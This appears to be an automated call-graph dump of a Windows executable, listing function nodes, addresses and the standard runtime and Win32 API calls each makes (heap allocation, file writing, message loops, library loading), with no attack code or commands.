93899 e0395c 93892->93899 93913 e06805 RaiseException 93893->93913 93895 dff538 93914 e0673b 47 API calls _free 93895->93914 93897 dff54a 93897->93812 93898->93812 93900 e039d7 __calloc_impl 93899->93900 93902 e03968 __calloc_impl 93899->93902 93920 e07c0e 47 API calls __getptd_noexit 93900->93920 93901 e03973 93901->93902 93915 e081c2 47 API calls 2 library calls 93901->93915 93916 e0821f 47 API calls 7 library calls 93901->93916 93917 e01145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93901->93917 93902->93901 93905 e0399b RtlAllocateHeap 93902->93905 93908 e039c3 93902->93908 93911 e039c1 93902->93911 93905->93902 93907 e039cf 93905->93907 93907->93892 93918 e07c0e 47 API calls __getptd_noexit 93908->93918 93919 e07c0e 47 API calls __getptd_noexit 93911->93919 93913->93895 93914->93897 93915->93901 93916->93901 93918->93911 93919->93907 93920->93907 93922 debd3f 93921->93922 93925 debd5a 93921->93925 94065 debdfa 93922->94065 93924 debd47 CharUpperBuffW 93924->93925 93925->93815 93927 de2b8b 93926->93927 93928 e5436a 93926->93928 93929 dff4ea 48 API calls 93927->93929 93931 de2b92 93929->93931 93930 de2bb3 93930->93837 93931->93930 94082 de2bce 48 API calls 93931->94082 93934 dee8f6 93933->93934 93966 dee906 Mailbox 93933->93966 93935 deed52 93934->93935 93934->93966 94183 dfe3cd 335 API calls 93935->94183 93937 deebdd 93937->93834 93939 deed63 93939->93937 93940 deed70 93939->93940 94185 dfe312 335 API calls Mailbox 93940->94185 93941 dee94c PeekMessageW 93941->93966 93943 e5526e Sleep 93943->93966 93944 deed77 LockWindowUpdate DestroyWindow GetMessageW 93944->93937 93946 deeda9 93944->93946 93948 e559ef TranslateMessage DispatchMessageW GetMessageW 93946->93948 93947 deebc7 93947->93937 94184 de2ff6 16 API calls 93947->94184 93948->93948 93950 e55a1f 93948->93950 93950->93937 93951 deed21 PeekMessageW 93951->93966 93952 deebf7 timeGetTime 93952->93966 93954 dff4ea 48 API calls 93954->93966 93955 de6eed 48 API calls 93955->93966 93956 deed3a TranslateMessage DispatchMessageW 93956->93951 93957 e55557 WaitForSingleObject 93959 e55574 GetExitCodeProcess CloseHandle 93957->93959 93957->93966 93958 e5588f Sleep 93978 e55429 Mailbox 93958->93978 93959->93966 93961 deedae timeGetTime 94186 de1caa 49 API calls 93961->94186 93962 e55733 Sleep 93962->93978 93963 dfdc38 timeGetTime 93963->93978 93966->93941 93966->93943 93966->93947 93966->93951 93966->93952 93966->93954 93966->93955 93966->93956 93966->93957 93966->93958 93966->93961 93966->93962 93972 e55445 Sleep 93966->93972 93966->93978 93979 de1caa 49 API calls 93966->93979 93985 defe30 311 API calls 93966->93985 93988 df3200 311 API calls 93966->93988 93990 ded6e9 55 API calls 93966->93990 93991 e2cc5c 86 API calls 93966->93991 93992 dece19 48 API calls 93966->93992 93993 de2aae 311 API calls 93966->93993 94083 deef00 93966->94083 94090 def110 93966->94090 94155 df45e0 93966->94155 94172 dfe244 93966->94172 94177 dfdc5f 93966->94177 94182 deeed0 335 API calls Mailbox 93966->94182 94187 e48d23 48 API calls 93966->94187 93968 e55926 GetExitCodeProcess 93970 e55952 CloseHandle 93968->93970 93971 e5593c WaitForSingleObject 93968->93971 93970->93978 93971->93966 93971->93970 93972->93966 93974 e55432 Sleep 93974->93972 93975 e48c4b 108 API calls 93975->93978 93976 de2c79 107 API calls 93976->93978 93977 e559ae Sleep 93977->93966 93978->93963 93978->93966 93978->93968 93978->93972 93978->93974 93978->93975 93978->93976 93978->93977 93984 ded6e9 55 API calls 93978->93984 94188 ded7f7 93978->94188 94193 e24cbe 49 API calls Mailbox 93978->94193 94194 de1caa 49 API calls 93978->94194 94195 dece19 93978->94195 94201 de2aae 335 API calls 93978->94201 94202 e3ccb2 50 API calls 93978->94202 94203 e27a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93978->94203 94204 e26532 63 API calls 3 library calls 93978->94204 93979->93966 93984->93978 93985->93966 93988->93966 93990->93966 93991->93966 93992->93966 93993->93966 93994->93823 93995->93883 93996->93834 93997->93834 93998->93834 94000 defe50 93999->94000 94023 defe7e 93999->94023 94001 dff4ea 48 API calls 94000->94001 94001->94023 94002 df146e 94003 de6eed 48 API calls 94002->94003 94025 deffe1 94003->94025 94004 ded7f7 48 API calls 94004->94023 94005 df0509 95307 e2cc5c 86 API calls 4 library calls 94005->95307 94006 dff4ea 48 API calls 94006->94023 94009 de6eed 48 API calls 94009->94023 94011 e5a246 94016 de6eed 48 API calls 94011->94016 94012 df1473 95306 e2cc5c 86 API calls 4 library calls 94012->95306 94013 e5a922 94013->93834 94016->94025 94017 e5a873 94017->93834 94018 e5a30e 94018->94025 95304 e197ed InterlockedDecrement 94018->95304 94019 e00f0a 52 API calls __cinit 94019->94023 94021 e197ed InterlockedDecrement 94021->94023 94022 e5a973 95308 e2cc5c 86 API calls 4 library calls 94022->95308 94023->94002 94023->94004 94023->94005 94023->94006 94023->94009 94023->94011 94023->94012 94023->94018 94023->94019 94023->94021 94023->94022 94023->94025 94027 df15b5 94023->94027 95302 df1820 335 API calls 2 library calls 94023->95302 95303 df1d10 59 API calls Mailbox 94023->95303 94025->93834 94026 e5a982 95305 e2cc5c 86 API calls 4 library calls 94027->95305 94028->93884 94029->93823 94031 ded654 94030->94031 94038 ded67e 94030->94038 94032 ded65b 94031->94032 94034 ded6c2 94031->94034 94033 ded666 94032->94033 94039 ded6ab 94032->94039 95309 ded9a0 53 API calls __cinit 94033->95309 94034->94039 95311 dfdce0 53 API calls 94034->95311 94038->93839 94038->93840 94039->94038 95310 dfdce0 53 API calls 94039->95310 94040->93883 94041->93865 94042->93865 94043->93870 94044->93883 94045->93852 94046->93883 94047->93883 94048->93883 94049->93834 94050->93834 94051->93834 94052->93834 94054 ded6f4 94053->94054 94055 ded71b 94054->94055 95312 ded764 55 API calls 94054->95312 94055->93851 94057->93883 94058->93868 94060 de6ef8 94059->94060 94061 de6f00 94059->94061 95313 dedd47 48 API calls ___crtGetEnvironmentStringsW 94060->95313 94061->93873 94063->93821 94064->93883 94066 debe0d 94065->94066 94070 debe0a ___crtGetEnvironmentStringsW 94065->94070 94067 dff4ea 48 API calls 94066->94067 94068 debe17 94067->94068 94071 dfee75 94068->94071 94070->93924 94073 dff4ea __calloc_impl 94071->94073 94072 e0395c _W_store_winword 47 API calls 94072->94073 94073->94072 94074 dff50c 94073->94074 94075 dff50e std::exception::exception 94073->94075 94074->94070 94080 e06805 RaiseException 94075->94080 94077 dff538 94081 e0673b 47 API calls _free 94077->94081 94079 dff54a 94079->94070 94080->94077 94081->94079 94082->93930 94084 deef2f 94083->94084 94085 deef1d 94083->94085 94206 e2cc5c 86 API calls 4 library calls 94084->94206 94205 dee3b0 335 API calls 2 library calls 94085->94205 94088 deef26 94088->93966 94089 e586f9 94089->94089 94091 def130 94090->94091 94092 defe30 335 API calls 94091->94092 94096 def199 94091->94096 94094 e58728 94092->94094 94093 def595 94100 ded7f7 48 API calls 94093->94100 94141 def431 Mailbox 94093->94141 94094->94096 94224 e2cc5c 86 API calls 4 library calls 94094->94224 94095 e587c8 94227 e2cc5c 86 API calls 4 library calls 94095->94227 94096->94093 94102 ded7f7 48 API calls 94096->94102 94135 def229 94096->94135 94143 def3dd 94096->94143 94097 def418 94104 e58b1b 94097->94104 94132 def6aa 94097->94132 94097->94141 94101 e587a3 94100->94101 94226 e00f0a 52 API calls __cinit 94101->94226 94105 e58772 94102->94105 94103 def3f2 94103->94097 94228 e29af1 48 API calls 94103->94228 94119 e58b2c 94104->94119 94120 e58bcf 94104->94120 94225 e00f0a 52 API calls __cinit 94105->94225 94108 def770 94112 e58a45 94108->94112 94118 def77a 94108->94118 94110 ded6e9 55 API calls 94110->94141 94111 e58810 94229 e3eef8 335 API calls 94111->94229 94234 dfc1af 48 API calls 94112->94234 94113 defe30 335 API calls 94113->94132 94114 e58b7e 94237 e3e40a 335 API calls Mailbox 94114->94237 94115 e58c53 94242 e2cc5c 86 API calls 4 library calls 94115->94242 94207 df1b90 94118->94207 94236 e3f5ee 335 API calls 94119->94236 94239 e2cc5c 86 API calls 4 library calls 94120->94239 94121 e58beb 94240 e3bdbd 335 API calls Mailbox 94121->94240 94123 defe30 335 API calls 94123->94141 94128 df1b90 48 API calls 94128->94141 94131 e58c00 94154 def537 Mailbox 94131->94154 94241 e2cc5c 86 API calls 4 library calls 94131->94241 94132->94108 94132->94113 94133 defce0 94132->94133 94132->94141 94132->94154 94133->94154 94238 e2cc5c 86 API calls 4 library calls 94133->94238 94134 e58823 94134->94097 94138 e5884b 94134->94138 94135->94093 94135->94097 94135->94141 94135->94143 94137 e2cc5c 86 API calls 94137->94141 94230 e3ccdc 48 API calls 94138->94230 94141->94110 94141->94114 94141->94115 94141->94121 94141->94123 94141->94128 94141->94133 94141->94137 94141->94154 94223 dedd47 48 API calls ___crtGetEnvironmentStringsW 94141->94223 94235 e197ed InterlockedDecrement 94141->94235 94243 dfc1af 48 API calls 94141->94243 94143->94095 94143->94103 94143->94141 94144 e58857 94146 e58865 94144->94146 94147 e588aa 94144->94147 94231 e29b72 48 API calls 94146->94231 94150 e588a0 Mailbox 94147->94150 94232 e2a69d 48 API calls 94147->94232 94148 defe30 335 API calls 94148->94154 94150->94148 94152 e588e7 94233 debc74 48 API calls 94152->94233 94154->93966 94156 df479f 94155->94156 94157 df4637 94155->94157 94160 dece19 48 API calls 94156->94160 94158 e56e05 94157->94158 94159 df4643 94157->94159 94306 e3e822 94158->94306 94305 df4300 335 API calls ___crtGetEnvironmentStringsW 94159->94305 94167 df46e4 Mailbox 94160->94167 94163 e56e11 94164 df4739 Mailbox 94163->94164 94346 e2cc5c 86 API calls 4 library calls 94163->94346 94164->93966 94166 df4659 94166->94163 94166->94164 94166->94167 94246 e26524 94167->94246 94249 de4252 94167->94249 94255 e2fa0c 94167->94255 94296 e36ff0 94167->94296 94174 e5df42 94172->94174 94176 dfe253 94172->94176 94173 e5df77 94174->94173 94175 e5df59 TranslateAcceleratorW 94174->94175 94175->94176 94176->93966 94178 dfdca3 94177->94178 94179 dfdc71 94177->94179 94178->93966 94179->94178 94180 dfdc96 IsDialogMessageW 94179->94180 94181 e5dd1d GetClassLongW 94179->94181 94180->94178 94180->94179 94181->94179 94181->94180 94182->93966 94183->93947 94184->93939 94185->93944 94186->93966 94187->93966 94189 dff4ea 48 API calls 94188->94189 94190 ded818 94189->94190 94191 dff4ea 48 API calls 94190->94191 94192 ded826 94191->94192 94192->93978 94193->93978 94194->93978 94196 dece28 __wsetenvp 94195->94196 94197 dfee75 48 API calls 94196->94197 94198 dece50 ___crtGetEnvironmentStringsW 94197->94198 94199 dff4ea 48 API calls 94198->94199 94200 dece66 94199->94200 94200->93978 94201->93978 94202->93978 94203->93978 94204->93978 94205->94088 94206->94089 94208 df1cf6 94207->94208 94212 df1ba2 94207->94212 94208->94141 94210 df1bb9 94211 df1c5d 94210->94211 94216 dff4ea 48 API calls 94210->94216 94211->94141 94213 dff4ea 48 API calls 94212->94213 94221 df1bae 94212->94221 94214 e549c4 94213->94214 94215 dff4ea 48 API calls 94214->94215 94222 e549cf 94215->94222 94217 df1c9f 94216->94217 94218 df1cb2 94217->94218 94244 de2925 48 API calls 94217->94244 94218->94141 94220 dff4ea 48 API calls 94220->94222 94221->94210 94245 dfc15c 48 API calls 94221->94245 94222->94220 94222->94221 94223->94141 94224->94096 94225->94135 94226->94141 94227->94154 94228->94111 94229->94134 94230->94144 94231->94150 94232->94152 94233->94150 94234->94141 94235->94141 94236->94141 94237->94133 94238->94154 94239->94154 94240->94131 94241->94154 94242->94154 94243->94141 94244->94218 94245->94210 94347 e26ca9 GetFileAttributesW 94246->94347 94250 de425c 94249->94250 94251 de4263 94249->94251 94351 e035e4 94250->94351 94253 de4272 94251->94253 94254 de4283 FreeLibrary 94251->94254 94253->94164 94254->94253 94256 e2fa1c __ftell_nolock 94255->94256 94257 e2fa44 94256->94257 94765 ded286 48 API calls 94256->94765 94657 de936c 94257->94657 94260 e2fa5e 94261 e2fa80 94260->94261 94262 e2fb68 94260->94262 94271 e2fb92 94260->94271 94263 de936c 81 API calls 94261->94263 94677 de41a9 94262->94677 94269 e2fa8c _wcscpy _wcschr 94263->94269 94266 e2fb8e 94268 de936c 81 API calls 94266->94268 94266->94271 94267 de41a9 136 API calls 94267->94266 94270 e2fbc7 94268->94270 94275 e2fab0 _wcscat _wcscpy 94269->94275 94280 e2fade _wcscat 94269->94280 94701 e01dfc 94270->94701 94271->94164 94273 de936c 81 API calls 94274 e2fafc _wcscpy 94273->94274 94766 e272cb GetFileAttributesW 94274->94766 94278 de936c 81 API calls 94275->94278 94276 e2fbeb _wcscat _wcscpy 94284 de936c 81 API calls 94276->94284 94278->94280 94279 e2fb1c __wsetenvp 94279->94271 94281 de936c 81 API calls 94279->94281 94280->94273 94282 e2fb48 94281->94282 94767 e260dd 77 API calls 4 library calls 94282->94767 94286 e2fc82 94284->94286 94285 e2fb5c 94285->94271 94704 e2690b 94286->94704 94288 e2fca2 94289 e26524 3 API calls 94288->94289 94290 e2fcb1 94289->94290 94291 de936c 81 API calls 94290->94291 94294 e2fce2 94290->94294 94292 e2fccb 94291->94292 94710 e2bfa4 94292->94710 94295 de4252 84 API calls 94294->94295 94295->94271 94297 de936c 81 API calls 94296->94297 94298 e3702a 94297->94298 95237 deb470 94298->95237 94300 e3703a 94301 e3705f 94300->94301 94302 defe30 335 API calls 94300->94302 94304 e37063 94301->94304 95265 decdb9 48 API calls 94301->95265 94302->94301 94304->94164 94305->94166 94307 e3e868 94306->94307 94308 e3e84e 94306->94308 95295 e3ccdc 48 API calls 94307->95295 95294 e2cc5c 86 API calls 4 library calls 94308->95294 94311 e3e871 94312 defe30 334 API calls 94311->94312 94313 e3e8cf 94312->94313 94314 e3e96a 94313->94314 94316 e3e916 94313->94316 94325 e3e860 Mailbox 94313->94325 94315 e3e978 94314->94315 94320 e3e9c7 94314->94320 95297 e2a69d 48 API calls 94315->95297 95296 e29b72 48 API calls 94316->95296 94319 e3e949 94323 df45e0 334 API calls 94319->94323 94321 de936c 81 API calls 94320->94321 94320->94325 94324 e3e9e1 94321->94324 94322 e3e99b 95298 debc74 48 API calls 94322->95298 94323->94325 94327 debdfa 48 API calls 94324->94327 94325->94163 94329 e3ea05 CharUpperBuffW 94327->94329 94328 e3e9a3 Mailbox 94331 df3200 334 API calls 94328->94331 94330 e3ea1f 94329->94330 94332 e3ea72 94330->94332 94333 e3ea26 94330->94333 94331->94325 94334 de936c 81 API calls 94332->94334 95299 e29b72 48 API calls 94333->95299 94335 e3ea7a 94334->94335 95300 de1caa 49 API calls 94335->95300 94338 e3ea54 94339 df45e0 334 API calls 94338->94339 94339->94325 94340 e3ea84 94340->94325 94341 de936c 81 API calls 94340->94341 94342 e3ea9f 94341->94342 95301 debc74 48 API calls 94342->95301 94344 e3eaaf 94345 df3200 334 API calls 94344->94345 94345->94325 94346->94164 94348 e26529 94347->94348 94349 e26cc4 FindFirstFileW 94347->94349 94348->94164 94349->94348 94350 e26cd9 FindClose 94349->94350 94350->94348 94352 e035f0 _flsall 94351->94352 94353 e03604 94352->94353 94354 e0361c 94352->94354 94386 e07c0e 47 API calls __getptd_noexit 94353->94386 94363 e03614 _flsall 94354->94363 94364 e04e1c 94354->94364 94357 e03609 94387 e06e10 8 API calls __wopenfile 94357->94387 94363->94251 94365 e04e2c 94364->94365 94366 e04e4e RtlEnterCriticalSection 94364->94366 94365->94366 94368 e04e34 94365->94368 94367 e0362e 94366->94367 94370 e03578 94367->94370 94389 e07cf4 94368->94389 94371 e03587 94370->94371 94372 e0359b 94370->94372 94474 e07c0e 47 API calls __getptd_noexit 94371->94474 94375 e03597 94372->94375 94434 e02c84 94372->94434 94374 e0358c 94475 e06e10 8 API calls __wopenfile 94374->94475 94388 e03653 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 94375->94388 94382 e035b5 94451 e0e9d2 94382->94451 94384 e035bb 94384->94375 94385 e01c9d _free 47 API calls 94384->94385 94385->94375 94386->94357 94387->94363 94388->94363 94390 e07d05 94389->94390 94391 e07d18 RtlEnterCriticalSection 94389->94391 94396 e07d7c 94390->94396 94391->94367 94393 e07d0b 94393->94391 94420 e0115b 47 API calls 3 library calls 94393->94420 94397 e07d88 _flsall 94396->94397 94398 e07d91 94397->94398 94399 e07da9 94397->94399 94421 e081c2 47 API calls 2 library calls 94398->94421 94406 e07e11 _flsall 94399->94406 94414 e07da7 94399->94414 94401 e07d96 94422 e0821f 47 API calls 7 library calls 94401->94422 94404 e07dbd 94407 e07dd3 94404->94407 94408 e07dc4 94404->94408 94405 e07d9d 94423 e01145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94405->94423 94406->94393 94409 e07cf4 __lock 46 API calls 94407->94409 94425 e07c0e 47 API calls __getptd_noexit 94408->94425 94413 e07dda 94409->94413 94412 e07dc9 94412->94406 94415 e07de9 InitializeCriticalSectionAndSpinCount 94413->94415 94416 e07dfe 94413->94416 94414->94399 94424 e069d0 47 API calls _W_store_winword 94414->94424 94417 e07e04 94415->94417 94426 e01c9d 94416->94426 94432 e07e1a RtlLeaveCriticalSection _doexit 94417->94432 94421->94401 94422->94405 94424->94404 94425->94412 94427 e01ccf __dosmaperr 94426->94427 94428 e01ca6 RtlFreeHeap 94426->94428 94427->94417 94428->94427 94429 e01cbb 94428->94429 94433 e07c0e 47 API calls __getptd_noexit 94429->94433 94431 e01cc1 GetLastError 94431->94427 94432->94406 94433->94431 94435 e02c97 94434->94435 94439 e02cbb 94434->94439 94436 e02933 __stbuf 47 API calls 94435->94436 94435->94439 94437 e02cb4 94436->94437 94476 e0af61 94437->94476 94440 e0eb36 94439->94440 94441 e035af 94440->94441 94442 e0eb43 94440->94442 94444 e02933 94441->94444 94442->94441 94443 e01c9d _free 47 API calls 94442->94443 94443->94441 94445 e02952 94444->94445 94446 e0293d 94444->94446 94445->94382 94613 e07c0e 47 API calls __getptd_noexit 94446->94613 94448 e02942 94614 e06e10 8 API calls __wopenfile 94448->94614 94450 e0294d 94450->94382 94452 e0e9de _flsall 94451->94452 94453 e0e9e6 94452->94453 94454 e0e9fe 94452->94454 94630 e07bda 47 API calls __getptd_noexit 94453->94630 94455 e0ea7b 94454->94455 94460 e0ea28 94454->94460 94634 e07bda 47 API calls __getptd_noexit 94455->94634 94458 e0e9eb 94631 e07c0e 47 API calls __getptd_noexit 94458->94631 94459 e0ea80 94635 e07c0e 47 API calls __getptd_noexit 94459->94635 94463 e0a8ed ___lock_fhandle 49 API calls 94460->94463 94466 e0ea2e 94463->94466 94464 e0e9f3 _flsall 94464->94384 94465 e0ea88 94636 e06e10 8 API calls __wopenfile 94465->94636 94468 e0ea41 94466->94468 94469 e0ea4c 94466->94469 94615 e0ea9c 94468->94615 94632 e07c0e 47 API calls __getptd_noexit 94469->94632 94472 e0ea47 94633 e0ea73 RtlLeaveCriticalSection __unlock_fhandle 94472->94633 94474->94374 94475->94375 94477 e0af6d _flsall 94476->94477 94478 e0af75 94477->94478 94479 e0af8d 94477->94479 94574 e07bda 47 API calls __getptd_noexit 94478->94574 94481 e0b022 94479->94481 94486 e0afbf 94479->94486 94579 e07bda 47 API calls __getptd_noexit 94481->94579 94482 e0af7a 94575 e07c0e 47 API calls __getptd_noexit 94482->94575 94485 e0b027 94580 e07c0e 47 API calls __getptd_noexit 94485->94580 94501 e0a8ed 94486->94501 94489 e0af82 _flsall 94489->94439 94490 e0b02f 94581 e06e10 8 API calls __wopenfile 94490->94581 94491 e0afc5 94493 e0afd8 94491->94493 94494 e0afeb 94491->94494 94510 e0b043 94493->94510 94576 e07c0e 47 API calls __getptd_noexit 94494->94576 94497 e0afe4 94578 e0b01a RtlLeaveCriticalSection __unlock_fhandle 94497->94578 94498 e0aff0 94577 e07bda 47 API calls __getptd_noexit 94498->94577 94502 e0a8f9 _flsall 94501->94502 94503 e0a946 RtlEnterCriticalSection 94502->94503 94504 e07cf4 __lock 47 API calls 94502->94504 94505 e0a96c _flsall 94503->94505 94506 e0a91d 94504->94506 94505->94491 94507 e0a928 InitializeCriticalSectionAndSpinCount 94506->94507 94508 e0a93a 94506->94508 94507->94508 94582 e0a970 RtlLeaveCriticalSection _doexit 94508->94582 94511 e0b050 __ftell_nolock 94510->94511 94512 e0b0ac 94511->94512 94513 e0b08d 94511->94513 94541 e0b082 94511->94541 94517 e0b105 94512->94517 94518 e0b0e9 94512->94518 94592 e07bda 47 API calls __getptd_noexit 94513->94592 94516 e0b092 94593 e07c0e 47 API calls __getptd_noexit 94516->94593 94521 e0b11c 94517->94521 94598 e0f82f 49 API calls 2 library calls 94517->94598 94595 e07bda 47 API calls __getptd_noexit 94518->94595 94519 e0b86b 94519->94497 94583 e13bf2 94521->94583 94523 e0b099 94594 e06e10 8 API calls __wopenfile 94523->94594 94526 e0b0ee 94596 e07c0e 47 API calls __getptd_noexit 94526->94596 94528 e0b12a 94530 e0b44b 94528->94530 94599 e07a0d 47 API calls 2 library calls 94528->94599 94532 e0b463 94530->94532 94533 e0b7b8 WriteFile 94530->94533 94531 e0b0f5 94597 e06e10 8 API calls __wopenfile 94531->94597 94537 e0b55a 94532->94537 94545 e0b479 94532->94545 94535 e0b7e1 GetLastError 94533->94535 94543 e0b410 94533->94543 94535->94543 94548 e0b663 94537->94548 94551 e0b565 94537->94551 94538 e0b150 GetConsoleMode 94538->94530 94540 e0b189 94538->94540 94539 e0b81b 94539->94541 94604 e07c0e 47 API calls __getptd_noexit 94539->94604 94540->94530 94544 e0b199 GetConsoleCP 94540->94544 94606 e0a70c 94541->94606 94543->94539 94543->94541 94550 e0b7f7 94543->94550 94544->94543 94569 e0b1c2 94544->94569 94545->94539 94546 e0b4e9 WriteFile 94545->94546 94546->94535 94547 e0b526 94546->94547 94547->94543 94547->94545 94557 e0b555 94547->94557 94548->94539 94552 e0b6d8 WideCharToMultiByte 94548->94552 94549 e0b843 94605 e07bda 47 API calls __getptd_noexit 94549->94605 94554 e0b812 94550->94554 94555 e0b7fe 94550->94555 94551->94539 94556 e0b5de WriteFile 94551->94556 94552->94535 94567 e0b71f 94552->94567 94603 e07bed 47 API calls __dosmaperr 94554->94603 94601 e07c0e 47 API calls __getptd_noexit 94555->94601 94556->94535 94560 e0b62d 94556->94560 94557->94543 94560->94543 94560->94551 94560->94557 94561 e0b727 WriteFile 94564 e0b77a GetLastError 94561->94564 94561->94567 94562 e0b803 94602 e07bda 47 API calls __getptd_noexit 94562->94602 94564->94567 94566 e140f7 59 API calls __chsize_nolock 94566->94569 94567->94543 94567->94548 94567->94557 94567->94561 94568 e15884 WriteConsoleW CreateFileW __chsize_nolock 94572 e0b2f6 94568->94572 94569->94543 94569->94566 94570 e0b28f WideCharToMultiByte 94569->94570 94569->94572 94600 e01688 57 API calls __isleadbyte_l 94569->94600 94570->94543 94571 e0b2ca WriteFile 94570->94571 94571->94535 94571->94572 94572->94535 94572->94543 94572->94568 94572->94569 94573 e0b321 WriteFile 94572->94573 94573->94535 94573->94572 94574->94482 94575->94489 94576->94498 94577->94497 94578->94489 94579->94485 94580->94490 94581->94489 94582->94503 94584 e13c0a 94583->94584 94585 e13bfd 94583->94585 94588 e13c16 94584->94588 94589 e07c0e __dosmaperr 47 API calls 94584->94589 94586 e07c0e __dosmaperr 47 API calls 94585->94586 94587 e13c02 94586->94587 94587->94528 94588->94528 94590 e13c37 94589->94590 94591 e06e10 __wopenfile 8 API calls 94590->94591 94591->94587 94592->94516 94593->94523 94594->94541 94595->94526 94596->94531 94597->94541 94598->94521 94599->94538 94600->94569 94601->94562 94602->94541 94603->94541 94604->94549 94605->94541 94607 e0a714 94606->94607 94608 e0a716 IsProcessorFeaturePresent 94606->94608 94607->94519 94610 e137b0 94608->94610 94611 e1375f ___raise_securityfailure 5 API calls 94610->94611 94612 e13893 94611->94612 94612->94519 94613->94448 94614->94450 94637 e0aba4 94615->94637 94617 e0eb00 94650 e0ab1e 48 API calls __dosmaperr 94617->94650 94618 e0eaaa 94618->94617 94619 e0eade 94618->94619 94621 e0aba4 __close_nolock 47 API calls 94618->94621 94619->94617 94622 e0aba4 __close_nolock 47 API calls 94619->94622 94624 e0ead5 94621->94624 94625 e0eaea CloseHandle 94622->94625 94623 e0eb08 94626 e0eb2a 94623->94626 94651 e07bed 47 API calls __dosmaperr 94623->94651 94628 e0aba4 __close_nolock 47 API calls 94624->94628 94625->94617 94629 e0eaf6 GetLastError 94625->94629 94626->94472 94628->94619 94629->94617 94630->94458 94631->94464 94632->94472 94633->94464 94634->94459 94635->94465 94636->94464 94638 e0abaf 94637->94638 94640 e0abc4 94637->94640 94652 e07bda 47 API calls __getptd_noexit 94638->94652 94644 e0abe9 94640->94644 94654 e07bda 47 API calls __getptd_noexit 94640->94654 94641 e0abb4 94653 e07c0e 47 API calls __getptd_noexit 94641->94653 94644->94618 94645 e0abf3 94655 e07c0e 47 API calls __getptd_noexit 94645->94655 94646 e0abbc 94646->94618 94648 e0abfb 94656 e06e10 8 API calls __wopenfile 94648->94656 94650->94623 94651->94626 94652->94641 94653->94646 94654->94645 94655->94648 94656->94646 94658 de9384 94657->94658 94675 de9380 94657->94675 94659 e54cbd __i64tow 94658->94659 94660 de9398 94658->94660 94661 e54bbf 94658->94661 94669 de93b0 __itow Mailbox _wcscpy 94658->94669 94768 e0172b 80 API calls 4 library calls 94660->94768 94663 e54ca5 94661->94663 94664 e54bc8 94661->94664 94769 e0172b 80 API calls 4 library calls 94663->94769 94668 e54be7 94664->94668 94664->94669 94665 dff4ea 48 API calls 94667 de93ba 94665->94667 94671 dece19 48 API calls 94667->94671 94667->94675 94670 dff4ea 48 API calls 94668->94670 94669->94665 94672 e54c04 94670->94672 94671->94675 94673 dff4ea 48 API calls 94672->94673 94674 e54c2a 94673->94674 94674->94675 94676 dece19 48 API calls 94674->94676 94675->94260 94676->94675 94770 de4214 94677->94770 94682 e54f73 94685 de4252 84 API calls 94682->94685 94683 de41d4 LoadLibraryExW 94780 de4291 94683->94780 94687 e54f7a 94685->94687 94689 de4291 3 API calls 94687->94689 94691 e54f82 94689->94691 94690 de41fb 94690->94691 94692 de4207 94690->94692 94806 de44ed 94691->94806 94694 de4252 84 API calls 94692->94694 94696 de420c 94694->94696 94696->94266 94696->94267 94698 e54fa9 94814 de4950 94698->94814 95097 e01e46 94701->95097 94705 e26918 _wcschr __ftell_nolock 94704->94705 94706 e01dfc __wsplitpath 47 API calls 94705->94706 94709 e2692e _wcscat _wcscpy 94705->94709 94707 e2695d 94706->94707 94708 e01dfc __wsplitpath 47 API calls 94707->94708 94708->94709 94709->94288 94711 e2bfb1 __ftell_nolock 94710->94711 94712 dff4ea 48 API calls 94711->94712 94713 e2c00e 94712->94713 94714 de47b7 48 API calls 94713->94714 94715 e2c018 94714->94715 94716 e2bdb4 GetSystemTimeAsFileTime 94715->94716 94717 e2c023 94716->94717 94718 de4517 83 API calls 94717->94718 94719 e2c036 _wcscmp 94718->94719 94720 e2c107 94719->94720 94721 e2c05a 94719->94721 94722 e2c56d 94 API calls 94720->94722 95140 e2c56d 94721->95140 94738 e2c0d3 _wcscat 94722->94738 94725 e01dfc __wsplitpath 47 API calls 94730 e2c088 _wcscat _wcscpy 94725->94730 94726 de44ed 64 API calls 94728 e2c12c 94726->94728 94727 e2c110 94727->94294 94729 de44ed 64 API calls 94728->94729 94731 e2c13c 94729->94731 94733 e01dfc __wsplitpath 47 API calls 94730->94733 94732 de44ed 64 API calls 94731->94732 94734 e2c157 94732->94734 94733->94738 94735 de44ed 64 API calls 94734->94735 94736 e2c167 94735->94736 94737 de44ed 64 API calls 94736->94737 94739 e2c182 94737->94739 94738->94726 94738->94727 94740 de44ed 64 API calls 94739->94740 94741 e2c192 94740->94741 94742 de44ed 64 API calls 94741->94742 94743 e2c1a2 94742->94743 94765->94257 94766->94279 94767->94285 94768->94669 94769->94669 94819 de4339 94770->94819 94774 de41bb 94777 e03499 94774->94777 94775 de4244 FreeLibrary 94775->94774 94776 de423c 94776->94774 94776->94775 94827 e034ae 94777->94827 94779 de41c8 94779->94682 94779->94683 94906 de42e4 94780->94906 94783 de42b8 94785 de41ec 94783->94785 94786 de42c1 FreeLibrary 94783->94786 94787 de4380 94785->94787 94786->94785 94788 dff4ea 48 API calls 94787->94788 94789 de4395 94788->94789 94914 de47b7 94789->94914 94791 de43a1 ___crtGetEnvironmentStringsW 94792 de43dc 94791->94792 94794 de4499 94791->94794 94795 de44d1 94791->94795 94793 de4950 57 API calls 94792->94793 94799 de43e5 94793->94799 94917 de406b CreateStreamOnHGlobal 94794->94917 94928 e2c750 93 API calls 94795->94928 94798 de44ed 64 API calls 94798->94799 94799->94798 94801 de4479 94799->94801 94802 e54ed7 94799->94802 94923 de4517 94799->94923 94801->94690 94803 de4517 83 API calls 94802->94803 94804 e54eeb 94803->94804 94805 de44ed 64 API calls 94804->94805 94805->94801 94807 de44ff 94806->94807 94808 e54fc0 94806->94808 94946 e0381e 94807->94946 94811 e2bf5a 95074 e2bdb4 94811->95074 94813 e2bf70 94813->94698 94815 de495f 94814->94815 94816 e55002 94814->94816 95079 e03e65 94815->95079 94818 de4967 94823 de434b 94819->94823 94822 de4321 LoadLibraryA GetProcAddress 94822->94776 94824 de422f 94823->94824 94825 de4354 LoadLibraryA 94823->94825 94824->94776 94824->94822 94825->94824 94826 de4365 GetProcAddress 94825->94826 94826->94824 94830 e034ba _flsall 94827->94830 94828 e034cd 94875 e07c0e 47 API calls __getptd_noexit 94828->94875 94830->94828 94832 e034fe 94830->94832 94831 e034d2 94876 e06e10 8 API calls __wopenfile 94831->94876 94846 e0e4c8 94832->94846 